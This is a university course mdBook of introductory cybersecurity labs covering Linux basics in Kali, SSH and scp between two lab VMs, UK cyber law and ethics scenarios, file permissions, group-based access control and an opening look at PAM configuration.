Introduction

This mdBook will grow over the duration of this module with new labs/workshops and general content needed to test and increase your knowledge of Cybersecurity Fundamentals.


The mdBook can be accessed outside of Blackboard and is mobile and tablet friendly. You can access it via this link, or navigate through the left pane. You can also access all lectures using this link.

Accessibility and Navigation

There are several methods for navigating through the chapters (i.e., sessions).

The sidebar on the left provides a list of all chapters/sessions. Clicking on any of the chapter/session titles will load that page.

The sidebar may not automatically appear if the window is too narrow, particularly on mobile displays. In that situation, the menu icon at the top-left of the page can be pressed to open and close the sidebar.

The arrow buttons at the bottom of the page can be used to navigate to the previous or the next chapter.

The left and right arrow keys on the keyboard can be used to navigate to the previous or the next chapter.

Top menu bar

The menu bar at the top of the page provides some icons for interacting with the book. The icons displayed will depend on the settings of how the book was generated.

| Icon | Description |
|---|---|
| Menu (three bars) | Opens and closes the chapter listing sidebar. |
| Paintbrush | Opens a picker to choose a different color theme. |
| Magnifying glass | Opens a search bar for searching within the book. |
| Printer | Instructs the web browser to print the entire book. |

Tapping the menu bar will scroll the page to the top.

Search

Each book has a built-in search system.

Pressing the search icon in the menu bar, or pressing the S key on the keyboard, will open an input box for entering search terms.

Typing some terms will show matching chapters and sections in real time.

Clicking any of the results will jump to that section. The up and down arrow keys can be used to navigate the results, and enter will open the highlighted section.

After loading a search result, the matching search terms will be highlighted in the text.

Clicking a highlighted word or pressing the Esc key will remove the highlighting.

You can change the theme of the mdBook by clicking the theme icon at the top left of the page. Next to it, there is a toggle for the table of contents and a search tool.

Printing

Currently the mdBook is approximately 60+ pages, and the environmental impact per printed page is roughly 10.2 L of water, 2 g of CO\(_2\) and 2 g of wood. Therefore, roughly 600 L of water, 120 g of CO\(_2\) and 120 g of wood would be needed to produce a paper copy of this mdBook.

The environmental effects of paper production include deforestation, the use of enormous amounts of energy and water, as well as air pollution and waste problems. Paper accounts for around 26% of total waste at landfills.

Therefore, please print only if this is really necessary.

Week-1: Lab Exercises for Cybersecurity Fundamentals

Please attempt all exercises. Feel free to ask questions at any time, but we encourage you to resolve issues independently to enhance your analytical skills.

Part-1: Cybersecurity Fundamentals

CIA Triad Analysis

Tasks:

- Using Google, find three different cyber-attacks that occurred within the last three years.

- For each attack, identify and discuss which aspect of the CIA Triad (Confidentiality, Integrity, Availability) was breached.

Use interactive timelines or cyber incident databases (e.g., EuRepoC).

Part-2: Introduction to Linux and Basic Commands in Kali Linux

This lab will introduce you to the Linux environment using the Kali Linux distribution. You will learn basic Linux commands, file navigation, process management, and user permissions, all without needing internet access.

Pre-requisites:

-

For on-campus users:

If you are doing this lab on campus, log in to the NUC workstation, locate the module folder (ask if you can't find it), then find the appropriate week's folder. Double-click the Kali Linux VM (CSF_VM1, in OVA format; the password can be found below), click Finish, and wait until the VM is deployed. You should then be able to find it in the left-hand corner of the VirtualBox window.

If VirtualBox encounters the error E_INVALIDARG (0x80070057), please follow these steps:







- From the menu bar, click File, then select Preferences.

- In the Preferences window, click Default Machine Folder.

- Choose Other, navigate to the C: drive, and create a new folder named vm.

- Select the newly created folder and click OK.

- After completing these steps, return to step one and attempt to load your virtual machine again.

-

For users with personal machines:

If you are using your own machine, please ensure the following:

- A working installation of Kali Linux, either on a VM or directly on your computer. To set up a VM, you'll need:

VMs

| VM | Username | Password |

|---|---|---|

| csf_vm1 | csf_vm1 | kalivm1 |

| csf_vm2 | csf_vm2 | kalivm2 |

Lab 1: Navigating the Linux File System

Step 1: Open the Terminal

- Boot into Kali Linux.

- Open the terminal by clicking the terminal icon or pressing Ctrl + Alt + T.

Step 2: Basic Command Overview

- `pwd`: Print the current working directory.

  Command: `pwd`

  This command shows the path of the directory you're currently in.

- `ls`: List directory contents.

  Command: `ls`

  This will show the files and directories in your current location. For more details, use `ls -l` to display file permissions and sizes.

- `cd`: Change directory.

  Command: `cd /path/to/directory`

  Use this command to move between directories. For example, `cd /home` will take you to the `/home` directory.

  Tip: `cd ..` will move you one directory up. Use `cd` on its own to go back to your home directory.

- `mkdir`: Create a new directory.

  Command: `mkdir <directory_name>`

  This command creates a new directory. Example: `mkdir myFolder` creates a directory named `myFolder`.

- `touch`: Create an empty file.

  Command: `touch <file_name>`

  Use `touch` to create an empty file. Example: `touch file1.txt` creates an empty file named `file1.txt`.

Exercise:

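- Navigate to the `/home` directory using `cd /home`.
- Use the `pwd` command to verify your location.
- Create a new directory named `CS_Lab` using `mkdir CS_Lab`. If `mkdir` reports "Permission denied" (ordinary users usually cannot write directly in `/home`), run `cd` to move to your own home directory and create the folder there instead.
- Change to the `CS_Lab` directory using `cd CS_Lab`.
- Inside the `CS_Lab` folder, create two empty files, `test1.txt` and `test2.txt`, using the `touch` command.
- Use the `ls` command to verify that both files are present.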
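The exercise above can be rehearsed in one go. The following is a minimal sketch that uses a temporary scratch directory (the `lab_root` variable is an assumption for illustration, not part of the lab) so that it runs without special permissions:

```sh
# Hypothetical scratch area so the sketch does not need write access to /home.
lab_root=$(mktemp -d)
cd "$lab_root" || exit 1

mkdir CS_Lab                # create the lab directory
cd CS_Lab || exit 1         # move into it
pwd                         # confirm the current location
touch test1.txt test2.txt   # create two empty files
ls                          # both files should be listed
```

On the lab VM you would replace the scratch directory with the location named in the exercise.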

Lab 2: Viewing and Managing Files

Step 1: File Manipulation Commands

- `cat`: Display the contents of a file.

  Command: `cat <file_name>`

  Example: `cat test1.txt` will display the contents of `test1.txt`.

- `echo`: Write text into a file or append text to it.

  Command: `echo "text" > <file_name>` (Overwrite)

  Command: `echo "text" >> <file_name>` (Append)

  Example: `echo "Hello Kali Linux" > test1.txt` will write "Hello Kali Linux" into the file `test1.txt`.

- `nano`: A simple text editor.

  Command: `nano <file_name>`

  Use `nano` to edit files directly in the terminal. For example, `nano test1.txt` will open the file in a text editor.

- `cp`: Copy files or directories.

  Command: `cp <source> <destination>`

  Example: `cp test1.txt test1_copy.txt` will copy `test1.txt` to a new file called `test1_copy.txt`.

- `mv`: Move or rename a file.

  Command: `mv <source> <destination>`

  Example: `mv test1.txt test1_renamed.txt` will rename `test1.txt` to `test1_renamed.txt`.

- `rm`: Delete a file or directory.

  Command: `rm <file_name>`

  Example: `rm test1.txt` will delete the file `test1.txt`.
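To see how these commands combine, here is a short sketch run inside a temporary directory (the `work` variable and the second line of text are assumptions added for illustration):

```sh
work=$(mktemp -d)
cd "$work" || exit 1

echo "Hello Kali Linux" > test1.txt   # overwrite: creates the file with one line
echo "A second line" >> test1.txt     # append: adds a line at the end
cat test1.txt                         # shows both lines

cp test1.txt test1_copy.txt           # copy the file
mv test1.txt test1_renamed.txt        # rename the original
rm test1_copy.txt                     # delete the copy
ls                                    # only test1_renamed.txt remains
```

Note the difference between `>` and `>>`: running the first `echo` again would discard the appended line.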

Lab 3: Basic Networking Commands

Although your PC has no access to the internet, you can still explore some basic networking commands and configurations.

Step 1: Networking Commands

-



ifconfig: Display network interface information.

Command:ifconfig

This command shows network information such as IP addresses and interfaces. -

ip addr: Show or manipulate routing, devices, and tunnels.

Command:ip addr show -

ping (local): Test connectivity within your local network (if applicable).

Command:ping <local_IP>(replace<local_IP>with another device's IP address in the same network, if available).

Exercise:

- Use `ifconfig` to display your network interfaces and IP addresses.
- Use `ip addr show` to view detailed information about network interfaces.
- If applicable, try to ping another machine on your local network using the `ping` command.

Part-3: Introduction to SSH

Objective:

- Understand what SSH is and its basic usage.

- Set up SSH on two Kali Linux VMs.

- Perform a task to connect between two cloned VMs using SSH.

What is SSH?

SSH (Secure Shell) is a network protocol used to securely log into remote machines, execute commands, and transfer data between them over an encrypted channel. It is commonly used by system administrators and developers to manage servers, perform remote work, and automate scripts securely.

Key features of SSH:

- Encryption: SSH encrypts the data sent between two machines, ensuring privacy and protection from eavesdropping.

- Authentication: SSH supports both password and key-based authentication, providing flexibility and increased security.

- Remote Command Execution: You can execute commands on a remote system as if you were physically present there.

- File Transfer: SSH allows secure file transfers via `scp` and `sftp`.

Task-1: How to Use SSH

Step 1: Installing and Starting SSH on Kali Linux

- Check if SSH is installed: On most Kali Linux installations, SSH is pre-installed. If your machine is connected to the internet, you can make sure the server and client packages are present with the commands below; otherwise, skip ahead to starting the SSH service.

  `sudo apt update`

  `sudo apt install openssh-server`

  `sudo apt install openssh-client`

- Start the SSH service: After ensuring SSH is installed, start the service:

  `sudo systemctl start ssh`

- Enable SSH to start on boot: To make sure SSH runs every time the system boots, run:

  `sudo systemctl enable ssh`

- Check SSH status: Verify that SSH is running correctly with:

  `sudo systemctl status ssh`

  If you see "active (running)", SSH is working and ready to accept connections.

Task-2: Connect Between Two VMs Using SSH

Step 1: Create VM2

- Go back to the week folder and double click on the second VM (CSF_VM2)

- Wait until it's deployed.

Step 2: Find IP Addresses of Both VMs

- On VM1: Find the IP address by running `ip a`. Look for the IP address of the virtual network interface (usually `eth0` or `wlan0`). For example, you might find `10.0.2.14`.

- On VM2: Similarly, find the IP address by running `ip a`. For example, VM2’s IP address might be `10.0.2.15`.

Note: IMPORTANT

If csf_vm1 and csf_vm2 have the same IP address, you need to set up a new NAT network as described below. Otherwise, please jump to Step 3.



Setting up a New NAT Network in VirtualBox



1: Create a New NAT Network

- Open VirtualBox.

- From the top menu, select File > Host Network Manager.

- In the window that appears, switch to the NAT Networks tab.

- Click the Create button (located on the right side) to create a new NAT network.

- Once created, select the network and click on the Properties button to adjust the following:

  - Network Name: Set a custom name if desired (e.g., `MyNATNetwork`).
  - Network CIDR: This defines the IP range. You can use something like `10.0.2.0/24` or `192.168.15.0/24` for the network range.
  - Enable DHCP: Ensure this is checked so that IP addresses will be automatically assigned to your VMs.

- Click OK to save and close the settings.
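As a quick aside on what the CIDR value means: the number after the slash is the prefix length, and the remaining bits of the 32-bit IPv4 address are available for hosts. The helper below is a small illustrative sketch (the function name `cidr_size` is made up for this example):

```sh
# Number of IPv4 addresses in a network with the given prefix length.
cidr_size() {
    prefix=$1
    echo $(( 1 << (32 - prefix) ))
}

cidr_size 24   # a /24 such as 10.0.2.0/24 spans 256 addresses
```

Not every address in the range can be handed to a VM, since the network and broadcast addresses are reserved, but a /24 is far more than the two VMs in this lab need.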





2: Connect a VM to the NAT Network

- Select the VM you want to connect to the new NAT network from the left panel in VirtualBox.

- Click on the Settings button (gear icon).

- In the Settings window, navigate to the Network tab.

- Under Adapter 1:

  - Check Enable Network Adapter.
  - Set Attached to: NAT Network.
  - Choose the NAT network you created (e.g., `MyNATNetwork`) from the drop-down.

- Click OK to save the changes.

3: Repeat for Other VMs

- Follow the same steps to connect other VMs to the same NAT network.

- Each VM connected to this NAT network will receive an IP address from the network range you configured.

Step 3: Connecting Between the Two VMs

- Connect from VM1 to VM2 using SSH

  On VM1, open a terminal and connect to VM2 using its IP address:

  `ssh username_of_vm2@vm2_ip`

  For example, if VM2's username is `csf_vm2` and VM2’s IP address is `10.0.2.15`, the command would be:

  `ssh csf_vm2@10.0.2.15`

  When prompted, enter the password for the user on VM2. If successful, you will be logged into VM2 from VM1.

- Connect from VM2 to VM1 using SSH

  On VM2, open a terminal and connect to VM1:

  `ssh username_of_vm1@vm1_ip`

  For example, if VM1’s IP address is `10.0.2.14` and the username is `csf_vm1`, the command would be:

  `ssh csf_vm1@10.0.2.14`

  Enter the password when prompted, and you will be logged into VM1 from VM2.

Step 4: File Transfer Between VMs Using scp

- On VM1: Create a simple text file:

  `echo "Hello from VM1" > vm1_file.txt`

- Transfer the file to VM2 using `scp`:

  `scp vm1_file.txt username_of_vm2@ip_of_vm2:path`

  Example (assuming VM2's IP address is `10.0.2.15`):

  `scp vm1_file.txt csf_vm2@10.0.2.15:/home/csf_vm2/`

- On VM2: Verify the file was transferred by listing the files in the `/home/csf_vm2/` directory:

  `ls /home/csf_vm2/`

  You should see `vm1_file.txt` in the directory.
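It is easy to mix up the two VMs' usernames and addresses when typing these commands. One way to avoid that, sketched below, is to store the remote details in variables and print the commands before running them. The values are the example ones used in this lab and are assumptions; replace them with what `ip a` reports on your VM2.

```sh
# Example values for VM2 from this lab; replace them with your own.
vm2_user="csf_vm2"
vm2_ip="10.0.2.15"
remote="${vm2_user}@${vm2_ip}"

# Build the commands as text and print them, so they can be checked first.
ssh_cmd="ssh ${remote}"
scp_cmd="scp vm1_file.txt ${remote}:/home/${vm2_user}/"
echo "$ssh_cmd"
echo "$scp_cmd"
```

Once the printed commands look right, run them on VM1 as shown in the steps above.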

More resources:

- Book: Linux in Action

- Learn the ways of Linux-fu using Linux Journey

Week-2: Legal and Ethical Considerations

This lab is designed to help you explore UK cybersecurity laws (see below) and ethical issues through interactive and engaging scenarios.

Scenario 1: The Data Protection Dilemma

- Brief: You are the IT manager at a retail company. A hacker demands a ransom after accessing customer data.

- Tasks:

- Identify: Research which laws apply.

- Decide: Create a debate: Pay the ransom or report the breach? List pros and cons.

Interactive Activity:

- Form groups and argue for different decisions.

Scenario 2: Surveillance Software Ethics

- Brief: Your company considers installing employee monitoring software.

- Tasks:

- Analyse: Discuss privacy concerns and ethical issues in small groups.

- Consult: Investigate GDPR and PECR guidelines about employee data.

- Propose: Design a policy balancing security and privacy, then present it.

Scenario 3: A Hacker's Redemption

- Brief: You are a white-hat hacker hired to test a company's security. You discover a significant vulnerability.

- Tasks:

- Legal Check: Research the Computer Misuse Act 1990's stance on ethical hacking.

Scenario 4: Data Breach at "TechCorp"

- Brief: TechCorp experienced a data breach exposing sensitive user information.

- Tasks:

- Investigate: Identify which laws apply.

Discussion and Reflection

- Group Discussion: Conduct a round-table discussion on balancing privacy and security.

Scenario 5: Applying the PSTI Act (2022) to Smart Device Compliance

You work as a compliance officer for TechSmart Ltd, a company planning to introduce a new Smart Home Hub to the UK market. The Smart Home Hub will connect with various IoT devices in a household, such as smart thermostats, cameras, and lights, providing seamless control for the user.

As part of your responsibility, you must ensure that the Smart Home Hub complies with the Product Security and Telecommunications Infrastructure (PSTI) Act (2022), a law designed to enhance the security of consumer smart devices sold in the UK.

However, your legal team has asked you to provide specific details from the PSTI Act on the following three areas:

- Password Security: How should the Smart Home Hub handle default or easily guessable passwords?

- Security Vulnerability Reporting: What must be done to ensure consumers can report security vulnerabilities? What details need to be provided to consumers?

- Security Updates: How long must the company provide security updates for the Smart Home Hub, and what information must be communicated to consumers about these updates?

Your task is to research the PSTI Act and find the relevant sections that apply to these areas. You will then present your findings and recommendations to the legal team to ensure the Smart Home Hub complies with the Act before launching in the UK.

Tools:

-

The PSTI regime can be viewed here.

-

Feel free to use GenAI to help you navigate long documents, but make sure you read the source material yourself, as not all generated content is fully accurate.

Task 1: Research and Identify Key Sections of the PSTI Act

-

Password Security:

- Research and identify which part of the PSTI Act addresses password policies for smart devices.

- What does the Act say about default passwords? What would you recommend to ensure that the Smart Home Hub is compliant in this area?

-

Security Vulnerability Reporting:

- Identify the requirements for manufacturers and retailers under the PSTI Act for reporting vulnerabilities.

- What information must be provided to consumers about how and where to report security issues?

-

Security Updates:

- Investigate the PSTI Act to determine how long a smart device must receive security updates.

- What does the law specify about informing consumers of these updates, and how can your company meet these requirements?

Task 2: Present Your Findings

Write a short report for the legal team covering:

-

Key Compliance Areas:

- Summarise the relevant sections of the PSTI Act that apply to password security, security reporting, and updates.

-

Recommendations:

- Provide clear recommendations for ensuring that the Smart Home Hub is compliant with the PSTI Act in each of the three areas.

Scenario 6: Ethical and Privacy Considerations for Linkio App

You work for Linkio, a start-up developing a social connection app that offers strong anonymity while connecting users based on shared interests and hobbies. The app also allows for secure peer-to-peer file sharing and group discussions. As part of the design team, you must consider potential privacy issues and ethical concerns before launch.

- Rely on the data protection legislation (DPA, UK GDPR).

Task 1: Privacy and Data Protection

-

Personal Data: Think about what personal information Linkio will collect from users.

- Question: How can Linkio ensure that this data is protected from misuse and unauthorised access?

-

User Privacy: Consider how Linkio can protect users' privacy during social interactions (e.g., messaging, group discussions, file sharing).

- Question: What steps should be taken to ensure users feel safe and secure when using the app?

-

Data Sharing: Reflect on how Linkio should handle sharing anonymised data with third parties (e.g., advertisers, research organisations).

- Examples: Sharing user behavior patterns or preferences.

- Question: What ethical issues arise when sharing user data with external companies, even if anonymised?

Activity:

Discuss in small groups how Linkio can manage and protect user data while still providing useful services. Share your ideas on how Linkio can maintain user privacy without compromising the user experience.

Task 2: Ethical Challenges in Social Apps

-

User Behavior: Consider potential misuse of the app, such as stalking, harassment, or inappropriate behavior in group discussions.

- Question: What ethical responsibilities does Linkio have to prevent harmful behavior and create a safe environment for all users?

-

Trust: Think about how Linkio can build trust with its users by ensuring their interactions and data are secure.

- Question: How can the app demonstrate its commitment to user privacy and safety, and what measures should be in place?

-

Transparency: Consider how transparent Linkio should be about its data collection methods, algorithms for social matching, and any data sharing with third parties.

- Question: How much information should Linkio reveal to users about how the app operates, and what should users know about how their data is handled?

Week-3: Access Control

Lab setup: if you're still not familiar with the lab setup, please revisit the Week 1 lab (it can be found in the module folder, or here if you have internet access):

-

All our labs should be in one folder, which you can find in the public drive under the module name CSF-MSc-19133.

-

To install a VM, double-click on the VM for this week (choose `csf_vm1`), which is located in the VM folder within the module folder. If VirtualBox encounters the error E_INVALIDARG (0x80070057), please follow the steps in the Pre-requisites section of the Week 1 lab, which can be found in the same module folder under week-1 or, if you have an internet connection, here.

Log in to Kali Linux:

- Username: `csf_vm1`
- Password: `kalivm1` (or the one you configured, if you have changed it).

Open Terminal:

- Once logged in, open the Terminal application by clicking on the Terminal icon in the taskbar or by pressing Ctrl + Alt + T.

Part 1: Permissions and ownerships

Task 1: Create a Folder and Three Files

Navigate to the Home Directory:

In the terminal, ensure you are in the home directory by typing:

cd

You can confirm that you are there with the `pwd` command; the output should be `/home/csf_vm1`.

Create a Folder:

To create a new folder called AccessControlLab, run the following command:

mkdir AccessControlLab

Navigate into the Folder:

Move into the newly created folder:

cd AccessControlLab

Create Three Files:

Create three empty text files using the touch command:

touch file1.txt file2.txt file3.txt

Verify the Files:

List the contents of the folder to confirm the files were created:

ls

You should see the following output:

file1.txt file2.txt file3.txt

Task 2: Understanding File Permissions and Ownership

1. Viewing File Permissions and Ownership

In Linux, every file and directory has associated permissions and ownership, which control who can access or modify them. Let’s start by displaying this information for the files you created.

List Files with Detailed Information:

In the terminal, while inside the AccessControlLab folder, type:

ls -l

This command will show a detailed list of the files along with their permissions, ownership, and other information. The output will look something like this:

-rw-r--r-- 1 csf_vm1 csf_vm1 0 Time file1.txt

-rw-r--r-- 1 csf_vm1 csf_vm1 0 Time file2.txt

-rw-r--r-- 1 csf_vm1 csf_vm1 0 Time file3.txt

2. Breaking Down the Output:

Here’s how to understand the output for each file:

- File type and Permissions (`-rw-r--r--`):

  - The first character (`-`) indicates the file type. A `-` means it is a regular file, whereas a `d` means it’s a directory.
  - The next nine characters represent the permissions:
    - `rw-` → Owner permissions: Read (r), Write (w), and no Execute (-).
    - `r--` → Group permissions: Read (r), no Write (-), and no Execute (-).
    - `r--` → Others permissions: Read (r), no Write (-), and no Execute (-).

- Number of Links (1): This refers to how many hard links point to the file.

- Owner (csf_vm1): The user who owns the file.

- Group (csf_vm1): The group that owns the file.

- File Size (0): The size of the file in bytes.

- Date and Time (current date and time): The last modification date and time.

- File Name (file1.txt): The name of the file.
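The same fields can be pulled out individually with `stat` from GNU coreutils (available on Kali). The sketch below works on a throwaway file in a temporary directory; the `demo` variable is an assumption for illustration:

```sh
demo=$(mktemp -d)
touch "$demo/file1.txt"
chmod 644 "$demo/file1.txt"   # set a known mode so the output is predictable

# %A permissions, %h hard links, %U owner, %G group, %s size in bytes, %n name
stat -c '%A %h %U %G %s %n' "$demo/file1.txt"

# Split the nine permission characters into the three classes.
perms=$(stat -c '%A' "$demo/file1.txt")
echo "owner:  $(echo "$perms" | cut -c2-4)"
echo "group:  $(echo "$perms" | cut -c5-7)"
echo "others: $(echo "$perms" | cut -c8-10)"
```

For a file with mode 644 the three classes come out as `rw-`, `r--` and `r--`, matching the breakdown above.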

3. File Ownership

In Linux, each file has two types of ownership:

- User (Owner): The user who created the file or was assigned ownership.

- Group: A group of users who share access to files.

By default, the owner of the file is the user who created it (in this case, csf_vm1). The group associated with the file is also the user’s primary group (here, csf_vm1).

To verify the ownership of the files:

You can check it using the ls -l output, which shows the Owner and Group as the third and fourth columns respectively.

4. Changing File Permissions

To modify the permissions of a file, you can use the chmod command. For example:

Removing Write Permission for the Owner:

To remove the write permission from the owner for file1.txt, type:

chmod u-w file1.txt

Verify the change by running ls -l again. You should now see:

-r--r--r-- 1 csf_vm1 csf_vm1 0 Time file1.txt

Giving Execute Permission to Others:

To allow others to execute file2.txt, type:

chmod o+x file2.txt

Verify the change with ls -l, which should show:

-rw-r--r-x 1 csf_vm1 csf_vm1 0 Time file2.txt
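Both symbolic changes can be checked side by side. This is a minimal sketch on scratch files (the `demo` directory is an assumption), with the starting mode set explicitly so the result does not depend on your umask:

```sh
demo=$(mktemp -d)
touch "$demo/file1.txt" "$demo/file2.txt"
chmod 644 "$demo/file1.txt" "$demo/file2.txt"   # known starting point: rw-r--r--

chmod u-w "$demo/file1.txt"   # remove write permission from the owner
chmod o+x "$demo/file2.txt"   # add execute permission for others

# Print the resulting permission strings next to the file names.
stat -c '%A %n' "$demo/file1.txt" "$demo/file2.txt"
```

The letters before the operator select the class (`u` owner, `g` group, `o` others, `a` all), `+` or `-` adds or removes, and the letters after it name the permission.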

5. Changing File Ownership

The chown command is used to change file ownership. For example:

Change the Owner of file3.txt:

To change the owner of file3.txt to another user (e.g., root), you need superuser privileges, so use sudo:

sudo chown root file3.txt

Verify the change:

ls -l file3.txt

The output will now show root as the owner of the file.

Change the Group of file3.txt:

To change the group ownership of file3.txt to sudo, use:

sudo chown :sudo file3.txt

The colon (:) separates the user and group in the chown command.

Task 3: Changing File Permissions with Numeric (Octal) Notation

In Linux, file permissions are assigned to three classes: Owner, Group, and Others. Each permission is associated with a numerical value: read (r) = 4, write (w) = 2, and execute (x) = 1.

The permissions are usually displayed in this format: rwxrwxrwx where:

- The first three letters represent the permissions for the Owner.

- The next three are for the Group.

- The last three are for Others (anyone else who has access).

| Octal Value | Permission | Binary Representation | Symbolic Representation |
|---|---|---|---|
| 0 | No permission | 000 | --- |
| 1 | Execute | 001 | --x |
| 2 | Write | 010 | -w- |
| 3 | Write & Execute | 011 | -wx |
| 4 | Read | 100 | r-- |
| 5 | Read & Execute | 101 | r-x |
| 6 | Read & Write | 110 | rw- |
| 7 | Read, Write & Execute | 111 | rwx |

Octal Notation Breakdown:

-

640 means:

- Owner: Read (4) + Write (2) = 6

- Group: Read (4) = 4

- Others: No permission (0)

-

744 means:

- Owner: Read (4) + Write (2) + Execute (1) = 7

- Group: Read (4) = 4

- Others: Read (4) = 4
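The arithmetic above can be turned into a small converter. The two functions below are an illustrative sketch (their names are made up for this example) that test each bit of an octal digit and build the matching `rwx` string:

```sh
# Convert one octal digit (0-7) into its rwx triplet by testing each bit.
digit_to_rwx() {
    d=$1
    out=""
    if [ $(( d & 4 )) -ne 0 ]; then out="${out}r"; else out="${out}-"; fi
    if [ $(( d & 2 )) -ne 0 ]; then out="${out}w"; else out="${out}-"; fi
    if [ $(( d & 1 )) -ne 0 ]; then out="${out}x"; else out="${out}-"; fi
    echo "$out"
}

# Convert a three-digit mode such as 640 into its nine-character form.
mode_to_symbolic() {
    mode=$1
    owner=$(echo "$mode" | cut -c1)
    group=$(echo "$mode" | cut -c2)
    others=$(echo "$mode" | cut -c3)
    echo "$(digit_to_rwx "$owner")$(digit_to_rwx "$group")$(digit_to_rwx "$others")"
}

mode_to_symbolic 640   # rw-r-----
mode_to_symbolic 744   # rwxr--r--
```

Each digit is handled independently, which is why the table of eight values is all you need to read any three-digit mode.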

Changing Permissions to 640

Let’s apply the 640 permission to file1.txt:

Set Permissions:

In the terminal, type the following command to set file1.txt to have 640 permissions:

chmod 640 file1.txt

Verify the Change:

Run ls -l to see the new permissions:

ls -l file1.txt

You should see:

-rw-r----- 1 csf_vm1 csf_vm1 0 Time file1.txt

Explanation:

- Owner: `rw-` → Read and Write (6).
- Group: `r--` → Read-only (4).
- Others: `---` → No permissions (0).

This means that only the owner can read and write the file, the group can only read it, and others have no access.


Changing Permissions to 744

Next, apply the 744 permission to file2.txt:

Set Permissions:

To set file2.txt with 744 permissions, run:

chmod 744 file2.txt

Verify the Change:

Again, list the file details using:

ls -l file2.txt

You should now see:

-rwxr--r-- 1 csf_vm1 csf_vm1 0 Time file2.txt

Explanation:

- Owner: `rwx` → Read, Write, and Execute (7).
- Group: `r--` → Read-only (4).
- Others: `r--` → Read-only (4).

Now the owner has full permissions (read, write, and execute), while the group and others can only read the file.

Common Octal Permissions:

- 777: Full permission for user, group, and others (rwxrwxrwx)
- 755: Full permission for user, read and execute for group and others (rwxr-xr-x)
- 644: Read and write for user, read-only for group and others (rw-r--r--)
- 600: Read and write for user, no permissions for group and others (rw-------)
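If you want to confirm these mappings on a real file system, the loop below applies each mode to a scratch file and prints the octal and symbolic forms together. It is a sketch that assumes GNU `stat` and uses a temporary `demo` directory made up for this example:

```sh
demo=$(mktemp -d)
for mode in 777 755 644 640 600; do
    touch "$demo/f$mode"
    chmod "$mode" "$demo/f$mode"
    # %a prints the octal mode, %A the symbolic form
    stat -c '%a %A' "$demo/f$mode"
done
```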

Research Questions:

-

What are the security implications of incorrectly setting file permissions in a multi-user environment? Provide a real-world example of a breach due to incorrect file permissions.

-

When would it be more secure to use `chmod 640` rather than `chmod 744` for sensitive files?

Part-2: Implementing Role-Based Access Control (RBAC)

Task 1: Create User Roles Using Groups

In Role-Based Access Control (RBAC), roles are represented by groups. Let's create groups to represent different roles.

Create User Roles:

In Linux, create groups to represent different roles. For example, create two roles (groups) jedi and sith:

- Note: `sudo` is a Linux command that allows permitted users to run commands with elevated privileges, such as the root user's privileges. When you use it, the system will ask for your password; enter it to confirm that you are an administrator. Normally it asks only once per session.
  - If you're using `csf_vm1`, the password is `kalivm1`.
  - If you're using `csf_vm2`, the password is `kalivm2`.

sudo groupadd jedi

sudo groupadd sith

Verify Group Creation:

Use the following command to check if the groups were created successfully:

cat /etc/group

You should see the groups jedi and sith at the end of the list.

Task 2: Create Users and Assign Them to Roles (Groups)

Now, we will create users and assign them to the roles (groups) we created.

Note: in Linux, the `-h` flag is commonly used either for help (e.g., `useradd -h`) or for human-readable output (e.g., `ls -lh`).

Create Users:

Create two users, luke and vader, using the following commands:

sudo useradd -m luke

sudo useradd -m vader

Verify User Creation:

Use the following command to check if the users were created successfully:

cat /etc/passwd

You should see the users luke and vader at the end of the list.

Alternatively, use the following command to list just the usernames:

getent passwd | cut -d: -f1

Assign Passwords to These Users:

- Enter a password of your choice for each user. To keep it simple, you can reuse the password of the VM you are currently using, which is `kalivm1`.

  `sudo passwd luke`

  `sudo passwd vader`

Assign Users to Groups (Roles):

Add luke to the jedi group:

sudo usermod -aG jedi luke

Add vader to the sith group:

sudo usermod -aG sith vader

Verify Group Membership:

Check the groups of each user to ensure they are assigned correctly:

groups luke

groups vader

You should see luke as part of jedi and vader as part of sith.

Task 3: Create Directories for Role-Based Access

Next, let's create directories that will only be accessible by specific roles (groups).

Create Directories for Each Role:

Under `/home`, create two directories: one for jedi and one for sith:

sudo mkdir /home/jedi

sudo mkdir /home/sith

Assign Ownership of Directories to the Respective Roles:

Change the ownership of the jedi directory to the jedi group:

sudo chown :jedi /home/jedi

Change the ownership of the sith directory to the sith group:

sudo chown :sith /home/sith

Set Permissions for the Directories:

Set the permissions so that only the respective groups have access to these directories:

For jedi (read, write, and execute for the owner and the jedi group; no access for others):

sudo chmod 770 /home/jedi

For sith (read, write, and execute for the owner and the sith group; no access for others):

sudo chmod 770 /home/sith

Verify Permissions:

Run ls -ld to verify that the permissions are set correctly (the -d option lists the directories themselves rather than their contents):

ls -ld /home/jedi /home/sith

The output should show the following:

drwxrwx--- 2 root jedi 4096 Sep 16 10:00 /home/jedi

drwxrwx--- 2 root sith 4096 Sep 16 10:00 /home/sith

Explanation:

- The `jedi` group has full access (read, write, execute) to `jedi`.
- The `sith` group has full access (read, write, execute) to `sith`.
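The effect of mode 770 on a directory can be previewed without sudo by using a scratch directory. This is a sketch only; the `demo` path stands in for `/home` and is an assumption for illustration:

```sh
demo=$(mktemp -d)
mkdir "$demo/jedi"
chmod 770 "$demo/jedi"          # owner and group: rwx, others: no access
stat -c '%A %n' "$demo/jedi"    # the permission string starts with d for a directory

# On the lab VM, access for a particular user can be checked like this (needs sudo):
#   sudo -u luke test -x /home/sith && echo "luke can enter" || echo "luke is blocked"
```

For directories, the execute bit controls whether a user may enter the directory with `cd`, which is what the next task tests.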

Task 4: Test Access Control

Now, let’s switch users and verify that they can access only the directories assigned to their roles.

Login as luke (jedi role):

Switch to the user luke:

su - luke

Try accessing the jedi directory:

cd /home/jedi

Result: Luke (as a Jedi) should have access to the jedi directory. You can confirm this with the pwd command; the output should be /home/jedi rather than /home/luke.

Try accessing the sith directory:

cd /home/sith

Result: Luke should not have access to the sith directory and should see a permission denied error.

Login as vader (sith role):

Switch to the user vader:

su - vader

Try accessing the sith directory:

cd /home/sith

Result: Vader (as a Sith) should have access to the sith directory.

Try accessing the jedi directory:

cd /home/jedi

Result: Vader should not have access to the jedi directory and should see a permission denied error.

Part 3: PAM

Overview of PAM Configuration

PAM (Pluggable Authentication Modules) is configured via files located in /etc/pam.d/. Each service that uses PAM for authentication (like login, sshd, sudo, etc.) has its own configuration file in this directory.

PAM Configuration Files:

- The main directory for PAM configurations is /etc/pam.d/.

- Each file in this directory corresponds to a service (e.g., login, sshd, sudo, etc.) that uses PAM for authentication.

To view the contents of this directory:

ls /etc/pam.d/

You should see files like common-auth, login, sshd, sudo, etc.

1. common-auth

This file is used for authentication configuration. It defines how users are authenticated on the system. For example, it could dictate whether passwords, biometric methods, or other mechanisms are used for login. PAM modules listed in this file decide how authentication is performed across various services (such as login, sudo, etc.).

